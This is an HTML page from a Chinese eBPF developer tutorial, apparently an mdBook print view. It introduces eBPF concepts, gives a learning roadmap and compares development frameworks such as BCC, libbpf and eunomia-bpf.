mirror of
https://github.com/eunomia-bpf/bpf-developer-tutorial.git
synced 2026-02-03 18:24:27 +08:00
8083 lines
623 KiB
HTML
8083 lines
623 KiB
HTML
<!DOCTYPE HTML>
|
||
<html lang="en" class="sidebar-visible no-js light">
|
||
<head>
|
||
<!-- Book generated using mdBook -->
|
||
<meta charset="UTF-8">
|
||
<title>bpf-developer-tutorial</title>
|
||
<meta name="robots" content="noindex" />
|
||
|
||
|
||
<!-- Custom HTML head -->
|
||
|
||
<meta name="description" content="">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||
<meta name="theme-color" content="#ffffff" />
|
||
|
||
<link rel="icon" href="favicon.svg">
|
||
<link rel="shortcut icon" href="favicon.png">
|
||
<link rel="stylesheet" href="css/variables.css">
|
||
<link rel="stylesheet" href="css/general.css">
|
||
<link rel="stylesheet" href="css/chrome.css">
|
||
<link rel="stylesheet" href="css/print.css" media="print">
|
||
|
||
<!-- Fonts -->
|
||
<link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
|
||
<link rel="stylesheet" href="fonts/fonts.css">
|
||
|
||
<!-- Highlight.js Stylesheets -->
|
||
<link rel="stylesheet" href="highlight.css">
|
||
<link rel="stylesheet" href="tomorrow-night.css">
|
||
<link rel="stylesheet" href="ayu-highlight.css">
|
||
|
||
<!-- Custom theme stylesheets -->
|
||
|
||
</head>
|
||
<body>
|
||
<div id="body-container">
|
||
<!-- Provide site root to javascript -->
|
||
<script>
|
||
var path_to_root = "";
|
||
var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "navy" : "light";
|
||
</script>
|
||
|
||
<!-- Work around some values being stored in localStorage wrapped in quotes -->
|
||
<script>
|
||
try {
|
||
var theme = localStorage.getItem('mdbook-theme');
|
||
var sidebar = localStorage.getItem('mdbook-sidebar');
|
||
|
||
if (theme.startsWith('"') && theme.endsWith('"')) {
|
||
localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
|
||
}
|
||
|
||
if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
|
||
localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
|
||
}
|
||
} catch (e) { }
|
||
</script>
|
||
|
||
<!-- Set the theme before any content is loaded, prevents flash -->
|
||
<script>
|
||
var theme;
|
||
try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
|
||
if (theme === null || theme === undefined) { theme = default_theme; }
|
||
var html = document.querySelector('html');
|
||
html.classList.remove('no-js')
|
||
html.classList.remove('light')
|
||
html.classList.add(theme);
|
||
html.classList.add('js');
|
||
</script>
|
||
|
||
<!-- Hide / unhide sidebar before it is displayed -->
|
||
<script>
|
||
var html = document.querySelector('html');
|
||
var sidebar = null;
|
||
if (document.body.clientWidth >= 1080) {
|
||
try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
|
||
sidebar = sidebar || 'visible';
|
||
} else {
|
||
sidebar = 'hidden';
|
||
}
|
||
html.classList.remove('sidebar-visible');
|
||
html.classList.add("sidebar-" + sidebar);
|
||
</script>
|
||
|
||
<nav id="sidebar" class="sidebar" aria-label="Table of contents">
|
||
<div class="sidebar-scrollbox">
|
||
<ol class="chapter"><li class="chapter-item expanded affix "><li class="part-title">eBPF 实践教程:基于 libbpf 和 CO-RE</li><li class="chapter-item expanded "><a href="0-introduce/index.html"><strong aria-hidden="true">1.</strong> 介绍 eBPF 的基本概念、常见的开发工具</a></li><li class="chapter-item expanded "><a href="1-helloworld/index.html"><strong aria-hidden="true">2.</strong> eBPF Hello World,基本框架和开发流程</a></li><li class="chapter-item expanded "><a href="2-kprobe-unlink/index.html"><strong aria-hidden="true">3.</strong> 使用 kprobe 监测捕获 unlink 系统调用</a></li><li class="chapter-item expanded "><a href="3-fentry-unlink/index.html"><strong aria-hidden="true">4.</strong> 使用 fentry 监测捕获 unlink 系统调用</a></li><li class="chapter-item expanded "><a href="4-opensnoop/index.html"><strong aria-hidden="true">5.</strong> 捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid</a></li><li class="chapter-item expanded "><a href="5-uprobe-bashreadline/index.html"><strong aria-hidden="true">6.</strong> 使用 uprobe 捕获 bash 的 readline 函数调用</a></li><li class="chapter-item expanded "><a href="6-sigsnoop/index.html"><strong aria-hidden="true">7.</strong> 捕获进程发送信号的系统调用集合,使用 hash map 保存状态</a></li><li class="chapter-item expanded "><a href="7-execsnoop/index.html"><strong aria-hidden="true">8.</strong> 捕获进程执行/退出时间,通过 perf event array 向用户态打印输出</a></li><li class="chapter-item expanded "><a href="8-exitsnoop/index.html"><strong aria-hidden="true">9.</strong> 使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出</a></li><li class="chapter-item expanded "><a href="9-runqlat/index.html"><strong aria-hidden="true">10.</strong> 一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度</a></li><li class="chapter-item expanded "><a href="10-hardirqs/index.html"><strong aria-hidden="true">11.</strong> 使用 hardirqs 或 softirqs 捕获中断事件</a></li><li class="chapter-item expanded "><a href="11-bootstrap/index.html"><strong aria-hidden="true">12.</strong> 使用 bootstrap 开发用户态程序并跟踪 exec() 和 exit() 系统调用</a></li><li class="chapter-item expanded "><a href="13-tcpconnlat/index.html"><strong aria-hidden="true">13.</strong> 使用 libbpf-bootstrap 开发程序统计 TCP 连接延时</a></li><li class="chapter-item expanded "><a href="14-tcpstates/index.html"><strong aria-hidden="true">14.</strong> 使用 libbpf-bootstrap 记录 TCP 连接状态与 TCP RTT</a></li><li class="chapter-item expanded "><a href="15-javagc/index.html"><strong aria-hidden="true">15.</strong> 使用 USDT 捕获用户态 Java GC 事件耗时</a></li><li class="chapter-item expanded "><a href="16-memleak/index.html"><strong aria-hidden="true">16.</strong> 编写 eBPF 程序 Memleak 监控内存泄漏</a></li><li class="chapter-item expanded "><a href="17-biopattern/index.html"><strong aria-hidden="true">17.</strong> 编写 eBPF 程序 Biopattern 统计随机/顺序磁盘 I/O</a></li><li class="chapter-item expanded "><a href="18-further-reading/index.html"><strong aria-hidden="true">18.</strong> 更多的参考资料</a></li><li class="chapter-item expanded "><a href="19-lsm-connect/index.html"><strong aria-hidden="true">19.</strong> 使用 LSM 进行安全检测防御</a></li><li class="chapter-item expanded "><a href="20-tc/index.html"><strong aria-hidden="true">20.</strong> 使用 eBPF 进行 tc 流量控制</a></li><li class="chapter-item expanded affix "><li class="part-title">eBPF 高级特性与进阶主题</li><li class="chapter-item expanded "><a href="22-android/index.html"><strong aria-hidden="true">21.</strong> 在 Android 上使用 eBPF 程序</a></li><li class="chapter-item expanded "><a href="23-http/index.html"><strong aria-hidden="true">22.</strong> 使用 eBPF 追踪 HTTP 请求或其他七层协议</a></li><li class="chapter-item expanded "><a href="29-sockops/index.html"><strong aria-hidden="true">23.</strong> 使用 sockops 加速网络请求转发</a></li><li class="chapter-item expanded "><a href="24-hide/index.html"><strong aria-hidden="true">24.</strong> 使用 eBPF 隐藏进程或文件信息</a></li><li class="chapter-item expanded "><a href="25-signal/index.html"><strong aria-hidden="true">25.</strong> 使用 bpf_send_signal 发送信号终止进程</a></li><li class="chapter-item expanded "><a href="26-sudo/index.html"><strong aria-hidden="true">26.</strong> 使用 eBPF 添加 sudo 用户</a></li><li class="chapter-item expanded "><a href="27-replace/index.html"><strong aria-hidden="true">27.</strong> 使用 eBPF 替换任意程序读取或写入的文本</a></li><li class="chapter-item expanded "><a href="28-detach/index.html"><strong aria-hidden="true">28.</strong> BPF的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序</a></li><li class="chapter-item expanded affix "><li class="part-title">bcc tutorial</li><li class="chapter-item expanded "><a href="bcc-documents/kernel-versions.html"><strong aria-hidden="true">29.</strong> BPF Features by Linux Kernel Version</a></li><li class="chapter-item expanded "><a href="bcc-documents/kernel_config.html"><strong aria-hidden="true">30.</strong> Kernel Configuration for BPF Features</a></li><li class="chapter-item expanded "><a href="bcc-documents/reference_guide.html"><strong aria-hidden="true">31.</strong> bcc Reference Guide</a></li><li class="chapter-item expanded "><a href="bcc-documents/special_filtering.html"><strong aria-hidden="true">32.</strong> Special Filtering</a></li><li class="chapter-item expanded "><a href="bcc-documents/tutorial.html"><strong aria-hidden="true">33.</strong> bcc Tutorial</a></li><li class="chapter-item expanded "><a href="bcc-documents/tutorial_bcc_python_developer.html"><strong aria-hidden="true">34.</strong> bcc Python Developer Tutorial</a></li></ol>
|
||
</div>
|
||
<div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
|
||
</nav>
|
||
|
||
<!-- Track and set sidebar scroll position -->
|
||
<script>
|
||
var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
|
||
sidebarScrollbox.addEventListener('click', function(e) {
|
||
if (e.target.tagName === 'A') {
|
||
sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
|
||
}
|
||
}, { passive: true });
|
||
var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
|
||
sessionStorage.removeItem('sidebar-scroll');
|
||
if (sidebarScrollTop) {
|
||
// preserve sidebar scroll position when navigating via links within sidebar
|
||
sidebarScrollbox.scrollTop = sidebarScrollTop;
|
||
} else {
|
||
// scroll sidebar to current active section when navigating via "next/previous chapter" buttons
|
||
var activeSection = document.querySelector('#sidebar .active');
|
||
if (activeSection) {
|
||
activeSection.scrollIntoView({ block: 'center' });
|
||
}
|
||
}
|
||
</script>
|
||
|
||
<div id="page-wrapper" class="page-wrapper">
|
||
|
||
<div class="page">
|
||
<div id="menu-bar-hover-placeholder"></div>
|
||
<div id="menu-bar" class="menu-bar sticky">
|
||
<div class="left-buttons">
|
||
<button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
|
||
<i class="fa fa-bars"></i>
|
||
</button>
|
||
<button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
|
||
<i class="fa fa-paint-brush"></i>
|
||
</button>
|
||
<ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
|
||
<li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
|
||
<li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
|
||
</ul>
|
||
<button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
|
||
<i class="fa fa-search"></i>
|
||
</button>
|
||
</div>
|
||
|
||
<h1 class="menu-title">bpf-developer-tutorial</h1>
|
||
|
||
<div class="right-buttons">
|
||
<a href="print.html" title="Print this book" aria-label="Print this book">
|
||
<i id="print-button" class="fa fa-print"></i>
|
||
</a>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
<div id="search-wrapper" class="hidden">
|
||
<form id="searchbar-outer" class="searchbar-outer">
|
||
<input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
|
||
</form>
|
||
<div id="searchresults-outer" class="searchresults-outer hidden">
|
||
<div id="searchresults-header" class="searchresults-header"></div>
|
||
<ul id="searchresults">
|
||
</ul>
|
||
</div>
|
||
</div>
|
||
|
||
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
|
||
<script>
|
||
document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
|
||
document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
|
||
Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
|
||
link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
|
||
});
|
||
</script>
|
||
|
||
<div id="content" class="content">
|
||
<main>
|
||
<h1 id="ebpf-入门开发实践教程零介绍-ebpf-的基本概念常见的开发工具"><a class="header" href="#ebpf-入门开发实践教程零介绍-ebpf-的基本概念常见的开发工具">eBPF 入门开发实践教程零:介绍 eBPF 的基本概念、常见的开发工具</a></h1>
|
||
<h2 id="1-ebpf简介安全和有效地扩展内核"><a class="header" href="#1-ebpf简介安全和有效地扩展内核">1. eBPF简介:安全和有效地扩展内核</a></h2>
|
||
<p>eBPF 是一项革命性的技术,起源于 Linux 内核,可以在操作系统的内核中运行沙盒程序。它被用来安全和有效地扩展内核的功能,而不需要改变内核的源代码或加载内核模块。eBPF 通过允许在操作系统内运行沙盒程序,应用程序开发人员可以在运行时,可编程地向操作系统动态添加额外的功能。然后,操作系统保证安全和执行效率,就像在即时编译(JIT)编译器和验证引擎的帮助下进行本地编译一样。eBPF 程序在内核版本之间是可移植的,并且可以自动更新,从而避免了工作负载中断和节点重启。</p>
|
||
<p>今天,eBPF被广泛用于各类场景:在现代数据中心和云原生环境中,可以提供高性能的网络包处理和负载均衡;以非常低的资源开销,做到对多种细粒度指标的可观测性,帮助应用程序开发人员跟踪应用程序,为性能故障排除提供洞察力;保障应用程序和容器运行时的安全执行,等等。可能性是无穷的,而 eBPF 在操作系统内核中所释放的创新才刚刚开始[3]。</p>
|
||
<h3 id="ebpf-的未来内核的-javascript-可编程接口"><a class="header" href="#ebpf-的未来内核的-javascript-可编程接口">eBPF 的未来:内核的 JavaScript 可编程接口</a></h3>
|
||
<p>对于浏览器而言,JavaScript 的引入带来的可编程性开启了一场巨大的革命,使浏览器发展成为几乎独立的操作系统。现在让我们回到 eBPF:为了理解 eBPF 对 Linux 内核的可编程性影响,对 Linux 内核的结构以及它如何与应用程序和硬件进行交互有一个高层次的理解是有帮助的[4]。</p>
|
||
<p><img src="0-introduce/kernel-arch.png" alt="kernel-arch" /></p>
|
||
<p>Linux 内核的主要目的是抽象出硬件或虚拟硬件,并提供一个一致的API(系统调用),允许应用程序运行和共享资源。为了实现这个目的,我们维护了一系列子系统和层,以分配这些责任[5]。每个子系统通常允许某种程度的配置,以考虑到用户的不同需求。如果不能配置所需的行为,就需要改变内核,从历史上看,改变内核的行为,或者让用户编写的程序能够在内核中运行,就有两种选择:</p>
|
||
<div class="table-wrapper"><table><thead><tr><th>本地支持内核模块</th><th>写一个内核模块</th></tr></thead><tbody>
|
||
<tr><td>改变内核源代码,并说服Linux内核社区相信这种改变是必要的。等待几年,让新的内核版本成为一种商品。</td><td>定期修复它,因为每个内核版本都可能破坏它。由于缺乏安全边界,冒着破坏你的Linux内核的风险</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<p>实际上,两种方案都不常用,前者成本太高,后者则几乎没有可移植性。</p>
|
||
<p>有了 eBPF,就有了一个新的选择,可以重新编程 Linux 内核的行为,而不需要改变内核的源代码或加载内核模块,同时保证在不同内核版本之间一定程度上的行为一致性和兼容性、以及安全性[6]。为了实现这个目的,eBPF 程序也需要有一套对应的 API,允许用户定义的应用程序运行和共享资源 --- 换句话说,某种意义上讲 eBPF 虚拟机也提供了一套类似于系统调用的机制,借助 eBPF 和用户态通信的机制,Wasm 虚拟机和用户态应用也可以获得这套“系统调用”的完整使用权,一方面能可编程地扩展传统的系统调用的能力,另一方面能在网络、文件系统等许多层次实现更高效的可编程 IO 处理。</p>
|
||
<p><img src="0-introduce/new-os-model.png" alt="new-os" /></p>
|
||
<p>正如上图所示,当今的 Linux 内核正在向一个新的内核模型演化:用户定义的应用程序可以在内核态和用户态同时执行,用户态通过传统的系统调用访问系统资源,内核态则通过 BPF Helper Calls 和系统的各个部分完成交互。截止 2023 年初,内核中的 eBPF 虚拟机中已经有 220 多个Helper 系统接口,涵盖了非常多的应用场景。</p>
|
||
<p>值得注意的是,BPF Helper Call 和系统调用二者并不是竞争关系,它们的编程模型和有性能优势的场景完全不同,也不会完全替代对方。对 Wasm 和 Wasi 相关生态来说,情况也类似,专门设计的 wasi 接口需要经历一个漫长的标准化过程,但可能在特定场景能为用户态应用获取更佳的性能和可移植性保证,而 eBPF 在保证沙箱本质和可移植性的前提下,可以提供一个快速灵活的扩展系统接口的方案。</p>
|
||
<p>目前的 eBPF 仍然处于早期阶段,但是借助当前 eBPF 提供的内核接口和用户态交互的能力,经由 Wasm-bpf 的系统接口转换,Wasm 虚拟机中的应用已经几乎有能力获取内核以及用户态任意一个函数调用的数据和返回值(kprobe,uprobe...);以很低的代价收集和理解所有系统调用,并获取所有网络操作的数据包和套接字级别的数据(tracepoint,socket...);在网络包处理解决方案中添加额外的协议分析器,并轻松地编程任何转发逻辑(XDP,TC...),以满足不断变化的需求,而无需离开Linux内核的数据包处理环境。</p>
|
||
<p>不仅如此,eBPF 还有能力往用户空间任意进程的任意地址写入数据(bpf_probe_write_user[7]),有限度地修改内核函数的返回值(bpf_override_return[8]),甚至在内核态直接执行某些系统调用[9];所幸的是,eBPF 在加载进内核之前对字节码会进行严格的安全检查,确保没有内存越界等操作,同时,许多可能会扩大攻击面、带来安全风险的功能都是需要在编译内核时明确选择启用才能使用的;在 Wasm 虚拟机将字节码加载进内核之前,也可以明确选择启用或者禁用某些 eBPF 功能,以确保沙箱的安全性。</p>
|
||
<h2 id="2-关于如何学习-ebpf-相关的开发的一些建议"><a class="header" href="#2-关于如何学习-ebpf-相关的开发的一些建议">2. 关于如何学习 eBPF 相关的开发的一些建议</a></h2>
|
||
<p>本文不会对 eBPF 的原理做更详细的介绍,不过这里有一个学习规划和参考资料,也许会有一些价值:</p>
|
||
<h3 id="ebpf-入门5-7h"><a class="header" href="#ebpf-入门5-7h">eBPF 入门(5-7h)</a></h3>
|
||
<ul>
|
||
<li>Google 或者其他搜索引擎查找:eBPF</li>
|
||
<li>询问 ChatGPT 之类的东西:eBPF 是什么?</li>
|
||
</ul>
|
||
<p>推荐:</p>
|
||
<ul>
|
||
<li>阅读 ebpf 简介:<a href="https://ebpf.io/">https://ebpf.io/</a> (30min)</li>
|
||
<li>简要了解一下 ebpf 内核相关文档:<a href="https://prototype-kernel.readthedocs.io/en/latest/bpf/">https://prototype-kernel.readthedocs.io/en/latest/bpf/</a> (知道有问题去哪里查询,30min)</li>
|
||
<li>阅读 ebpf 中文入门指南:<a href="https://www.modb.pro/db/391570">https://www.modb.pro/db/391570</a> (1h)</li>
|
||
<li>有大量的参考资料:<a href="https://github.com/zoidbergwill/awesome-ebpf">https://github.com/zoidbergwill/awesome-ebpf</a> (2-3h)</li>
|
||
<li>可以选自己感兴趣的 PPT 翻一翻:<a href="https://github.com/gojue/ebpf-slide">https://github.com/gojue/ebpf-slide</a> (1-2h)</li>
|
||
</ul>
|
||
<p>回答三个问题:</p>
|
||
<ol>
|
||
<li>了解 eBPF 是什么东西?为啥要有这个玩意,不能用内核模块?</li>
|
||
<li>它有什么功能?能在 Linux 内核里面完成哪些事情?有哪些 eBPF 程序的类型和 helper(不需要知道全部,但是需要知道去哪里找)?</li>
|
||
<li>能拿来做什么?比如说在哪些场景中进行运用?网络、安全、可观测性?</li>
|
||
</ol>
|
||
<h3 id="了解如何开发-ebpf-程序10-15h"><a class="header" href="#了解如何开发-ebpf-程序10-15h">了解如何开发 eBPF 程序(10-15h)</a></h3>
|
||
<p>了解并尝试一下 eBPF 开发框架:</p>
|
||
<ul>
|
||
<li>BCC 开发各类小工具的例子:<a href="https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md">https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md</a> (跑一遍,3-4h)</li>
|
||
<li>libbpf 的一些例子:<a href="https://github.com/libbpf/libbpf-bootstrap">https://github.com/libbpf/libbpf-bootstrap</a> (选感兴趣的运行一下,并阅读一下源代码,2h)</li>
|
||
<li>基于 libbpf 和 eunomia-bpf 的教程:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> (阅读 1-10 的部分,3-4h)</li>
|
||
</ul>
|
||
<p>其他开发框架:Go 语言或者 Rust 语言,请自行搜索并且尝试(0-2h)</p>
|
||
<p>有任何问题或者想了解的东西,不管是不是和本项目相关,都可以在本项目的 discussions 里面开始讨论。</p>
|
||
<p>回答一些问题,并且进行一些尝试(2-5h):</p>
|
||
<ol>
|
||
<li>如何开发一个最简单的 eBPF 程序?</li>
|
||
<li>如何用 eBPF 追踪一个内核功能或函数?有很多种方法,举出对应的代码;</li>
|
||
<li>有哪些方案能通过用户态和内核态通信?如何从用户态向内核态传送信息?如何从内核态向用户态传递信息?举出代码示例;</li>
|
||
<li>编写一个你自己的 eBPF 程序,实现一个功能;</li>
|
||
<li>eBPF 程序的整个生命周期里面,分别在用户态和内核态做了哪些事情?</li>
|
||
</ol>
|
||
<h2 id="3-如何使用ebpf编程"><a class="header" href="#3-如何使用ebpf编程">3. 如何使用eBPF编程</a></h2>
|
||
<p>原始的eBPF程序编写是非常繁琐和困难的。为了改变这一现状,llvm于2015年推出了可以将由高级语言编写的代码编译为eBPF字节码的功能,同时,eBPF 社区将 <code>bpf()</code> 等原始的系统调用进行了初步地封装,给出了<code>libbpf</code>库。这些库会包含将字节码加载到内核中的函数以及一些其他的关键函数。在Linux的源码包的<code>samples/bpf/</code>目录下,有大量Linux提供的基于<code>libbpf</code>的eBPF样例代码。</p>
|
||
<p>一个典型的基于 <code>libbpf</code> 的eBPF程序具有<code>*_kern.c</code>和<code>*_user.c</code>两个文件,<code>*_kern.c</code>中书写在内核中的挂载点以及处理函数,<code>*_user.c</code>中书写用户态代码,完成内核态代码注入以及与用户交互的各种任务。 更为详细的教程可以参考<a href="https://www.bilibili.com/video/BV1f54y1h74r?spm_id_from=333.999.0.0">该视频</a>然而由于该方法仍然较难理解且入门存在一定的难度,因此现阶段的eBPF程序开发大多基于一些工具,比如:</p>
|
||
<ul>
|
||
<li>BCC</li>
|
||
<li>BPFtrace</li>
|
||
<li>libbpf-bootstrap</li>
|
||
<li>Go eBPF library</li>
|
||
</ul>
|
||
<p>以及还有比较新的工具,例如 <code>eunomia-bpf</code>.</p>
|
||
<h2 id="编写-ebpf-程序"><a class="header" href="#编写-ebpf-程序">编写 eBPF 程序</a></h2>
|
||
<p>eBPF 程序由内核态部分和用户态部分构成。内核态部分包含程序的实际逻辑,用户态部分负责加载和管理内核态部分。使用 eunomia-bpf 开发工具,只需编写内核态部分的代码。</p>
|
||
<p>内核态部分的代码需要符合 eBPF 的语法和指令集。eBPF 程序主要由若干个函数组成,每个函数都有其特定的作用。可以使用的函数类型包括:</p>
|
||
<ul>
|
||
<li>kprobe:插探函数,在指定的内核函数前或后执行。</li>
|
||
<li>tracepoint:跟踪点函数,在指定的内核跟踪点处执行。</li>
|
||
<li>raw_tracepoint:原始跟踪点函数,在指定的内核原始跟踪点处执行。</li>
|
||
<li>xdp:网络数据处理函数,拦截和处理网络数据包。</li>
|
||
<li>perf_event:性能事件函数,用于处理内核性能事件。</li>
|
||
<li>kretprobe:函数返回插探函数,在指定的内核函数返回时执行。</li>
|
||
<li>tracepoint_return:跟踪点函数返回,在指定的内核跟踪点返回时执行。</li>
|
||
<li>raw_tracepoint_return:原始跟踪点函数返回,在指定的内核原始跟踪</li>
|
||
</ul>
|
||
<h3 id="bcc"><a class="header" href="#bcc">BCC</a></h3>
|
||
<p>BCC全称为BPF Compiler Collection,该项目是一个python库,
|
||
包含了完整的编写、编译、和加载BPF程序的工具链,以及用于调试和诊断性能问题的工具。</p>
|
||
<p>自2015年发布以来,BCC经过上百位贡献者地不断完善后,目前已经包含了大量随时可用的跟踪工具。<a href="https://github.com/iovisor/bcc/blob/master/docs/tutorial.md">其官方项目库</a>
|
||
提供了一个方便上手的教程,用户可以快速地根据教程完成BCC入门工作。</p>
|
||
<p>用户可以在BCC上使用Python、Lua等高级语言进行编程。
|
||
相较于使用C语言直接编程,这些高级语言具有极大的便捷性,用户只需要使用C来设计内核中的
|
||
BPF程序,其余包括编译、解析、加载等工作在内,均可由BCC完成。</p>
|
||
<p>然而使用BCC存在一个缺点便是在于其兼容性并不好。基于BCC的
|
||
eBPF程序每次执行时候都需要进行编译,编译则需要用户配置相关的头文件和对应实现。在实际应用中,
|
||
相信大家也会有体会,编译依赖问题是一个很棘手的问题。也正是因此,在本项目的开发中我们放弃了BCC,
|
||
选择了可以做到一次编译-多次运行的libbpf-bootstrap工具。</p>
|
||
<h3 id="ebpf-go-library"><a class="header" href="#ebpf-go-library">eBPF Go library</a></h3>
|
||
<p>eBPF Go库提供了一个通用的eBPF库,它解耦了获取 eBPF 字节码的过程和 eBPF 程序的加载和管理,并实现了类似 libbpf 一样的 CO- 功能。eBPF程序通常是通过编写高级语言创建的,然后使用clang/LLVM编译器编译为eBPF字节码。</p>
|
||
<h3 id="libbpf"><a class="header" href="#libbpf">libbpf</a></h3>
|
||
<p><code>libbpf-bootstrap</code>是一个基于<code>libbpf</code>库的BPF开发脚手架,从其
|
||
<a href="https://github.com/libbpf/libbpf-bootstrap">github</a> 上可以得到其源码。</p>
|
||
<p><code>libbpf-bootstrap</code>综合了BPF社区过去多年的实践,为开发者提了一个现代化的、便捷的工作流,实
|
||
现了一次编译,重复使用的目的。</p>
|
||
<p>基于<code>libbpf-bootstrap</code>的BPF程序对于源文件有一定的命名规则,
|
||
用于生成内核态字节码的bpf文件以<code>.bpf.c</code>结尾,用户态加载字节码的文件以<code>.c</code>结尾,且这两个文件的
|
||
前缀必须相同。</p>
|
||
<p>基于<code>libbpf-bootstrap</code>的BPF程序在编译时会先将<code>*.bpf.c</code>文件编译为
|
||
对应的<code>.o</code>文件,然后根据此文件生成<code>skeleton</code>文件,即<code>*.skel.h</code>,这个文件会包含内核态中定义的一些
|
||
数据结构,以及用于装载内核态代码的关键函数。在用户态代码<code>include</code>此文件之后调用对应的装载函数即可将
|
||
字节码装载到内核中。同样的,<code>libbpf-bootstrap</code>也有非常完备的入门教程,用户可以在<a href="https://nakryiko.com/posts/libbpf-bootstrap/">该处</a>
|
||
得到详细的入门操作介绍。</p>
|
||
<h3 id="eunomia-bpf"><a class="header" href="#eunomia-bpf">eunomia-bpf</a></h3>
|
||
<p>开发、构建和分发 eBPF 一直以来都是一个高门槛的工作,使用 BCC、bpftrace 等工具开发效率高、可移植性好,但是分发部署时需要安装 LLVM、Clang等编译环境,每次运行的时候执行本地或远程编译过程,资源消耗较大;使用原生的 CO-RE libbpf时又需要编写不少用户态加载代码来帮助 eBPF 程序正确加载和从内核中获取上报的信息,同时对于 eBPF 程序的分发、管理也没有很好地解决方案。</p>
|
||
<p><a href="https://github.com/eunomia-bpf/eunomia-bpf">eunomia-bpf</a> 是一个开源的 eBPF 动态加载运行时和开发工具链,是为了简化 eBPF 程序的开发、构建、分发、运行而设计的,基于 libbpf 的 CO-RE 轻量级开发框架。</p>
|
||
<p>使用 eunomia-bpf ,可以:</p>
|
||
<ul>
|
||
<li>在编写 eBPF 程序或工具时只编写内核态代码,自动获取内核态导出信息,并作为模块动态加载;</li>
|
||
<li>使用 WASM 进行用户态交互程序的开发,在 WASM 虚拟机内部控制整个 eBPF 程序的加载和执行,以及处理相关数据;</li>
|
||
<li>eunomia-bpf 可以将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块,跨架构和内核版本进行分发,无需重新编译即可动态加载运行。</li>
|
||
</ul>
|
||
<p>eunomia-bpf 由一个编译工具链和一个运行时库组成, 对比传统的 BCC、原生 libbpf 等框架,大幅简化了 eBPF 程序的开发流程,在大多数时候只需编写内核态代码,即可轻松构建、打包、发布完整的 eBPF 应用,同时内核态 eBPF 代码保证和主流的 libbpf, libbpfgo, libbpf-rs 等开发框架的 100% 兼容性。需要编写用户态代码的时候,也可以借助 Webassembly 实现通过多种语言进行用户态开发。和 bpftrace 等脚本工具相比, eunomia-bpf 保留了类似的便捷性, 同时不仅局限于 trace 方面, 可以用于更多的场景, 如网络、安全等等。</p>
|
||
<blockquote>
|
||
<ul>
|
||
<li>eunomia-bpf 项目 Github 地址: <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></li>
|
||
<li>gitee 镜像: <a href="https://gitee.com/anolis/eunomia">https://gitee.com/anolis/eunomia</a></li>
|
||
</ul>
|
||
</blockquote>
|
||
<h2 id="参考资料"><a class="header" href="#参考资料">参考资料</a></h2>
|
||
<ul>
|
||
<li>eBPF 介绍:<a href="https://ebpf.io/">https://ebpf.io/</a></li>
|
||
<li>BPF Compiler Collection (BCC):<a href="https://github.com/iovisor/bcc">https://github.com/iovisor/bcc</a></li>
|
||
<li>eunomia-bpf:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></li>
|
||
</ul>
|
||
<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程源代码,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程二hello-world基本框架和开发流程"><a class="header" href="#ebpf-入门开发实践教程二hello-world基本框架和开发流程">eBPF 入门开发实践教程二:Hello World,基本框架和开发流程</a></h1>
|
||
<p>在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。</p>
|
||
